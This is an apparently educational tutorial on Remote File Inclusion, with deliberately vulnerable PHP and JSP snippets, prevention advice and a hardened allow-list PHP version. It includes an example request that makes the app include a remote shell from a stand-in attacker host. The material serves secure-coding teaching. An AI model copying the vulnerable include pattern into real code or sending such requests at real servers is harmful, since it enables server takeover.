Remote File Inclusion (RFI) is a vulnerability in a web application that lets a file hosted on an attacker-controlled server be included into the web application. Two things come together here. First, the application's requirement might be to display the content of a file, or to read a file. Second, a security weakness in the code lets the attacker choose which file gets included. The most common purpose in exploiting this vulnerability is arbitrary code execution, through which the attacker can take control of the web server.
Let's look at a classic piece of PHP code that leads to this attack.
```php
/**
 * Using the GET method to receive the file name.
 * Example URL - http://hackable.com/?file=article.php
 */
$file = $_GET['file'];

/**
 * Using the include function to include the file.
 * Example - article.php
 */
include($file);
```
Now, this code is deployed on the web server. The first thing an attacker will think of is to include a file from the attacking machine.
Looking at the above example, a malicious file from the attacker's site is included into the target web application. The attacker creates a malicious backdoor shell page, which executes its code from within the target web application and gives the attacker enough control to take over it.
Another example, this time JavaServer Pages (JSP) code using the JSTL import tag:
```jsp
...
<c:import url="<%= request.getParameter("contacts") %>">
...
```
Even in this scenario, the attacker can include a malicious file and execute commands in the target web application.
What’s leading to this attack?
First and foremost is unsanitized input passed from the user to the web server. Any unsanitized or unfiltered user input opens up many security loopholes in a web application.
Prevention from this attack
- Always sanitize user input from the HTTP request. Never trust user-supplied input from the HTTP request blindly, without proper sanitization.
- Use frameworks, CMSs or libraries in your application that are free from file inclusion vulnerabilities.
- Disable the include function if it is not necessary for all user roles in the application. Enforce a strong access-control check before processing the request from the user.
- If the function is needed, whitelist the file extension and the file itself, and enforce that check in your web application on the server side, not the client side (though there are always plenty of ways to bypass this kind of control).
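A hardened version of the PHP snippet above, written here as an added example (not code from the original post): it replaces the raw `include($_GET['file'])` with a server-side allow-list lookup, as the last prevention point recommends. The `pages/` directory, the allow-list entries and the `resolveIncludePath()` helper are assumptions for the example.

```php
<?php
/**
 * Hardened replacement for include($_GET['file']).
 * Assumptions (not from the original post): includable pages live under
 * ./pages/, and the only valid ?file= values are the keys of $allowedPages.
 * Pair this with allow_url_include = Off in php.ini so that include()
 * can never fetch a remote URL at all.
 */

// Server-side allow-list: request parameter -> file on disk. Only these
// paths are ever handed to include(), so remote URLs and ../ sequences
// supplied by the client never reach it.
const PAGES_DIR = __DIR__ . '/pages';
$allowedPages = [
    'article' => 'article.php',
    'contact' => 'contact.php',
];

/**
 * Map the user-supplied page name to a path that is safe to include,
 * or return null when the name is not on the allow-list.
 */
function resolveIncludePath(string $requested, array $allowed, string $baseDir): ?string
{
    // Exact key lookup; no substring, extension or pattern matching.
    if (!array_key_exists($requested, $allowed)) {
        return null;
    }
    $candidate = $baseDir . '/' . $allowed[$requested];

    // Second check: the resolved real path must still sit inside $baseDir.
    // This catches a mistyped allow-list entry or a stray symlink.
    $real = realpath($candidate);
    $base = realpath($baseDir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$requested = $_GET['file'] ?? 'article';
$path = resolveIncludePath($requested, $allowedPages, PAGES_DIR);

if ($path === null) {
    // Unknown page: refuse and log, never fall back to the raw parameter.
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

With this in place a request such as `?file=http://attacker.example/shell.txt` simply fails the allow-list lookup and is answered with a 404, which is also a useful signal to alert on in the web server logs.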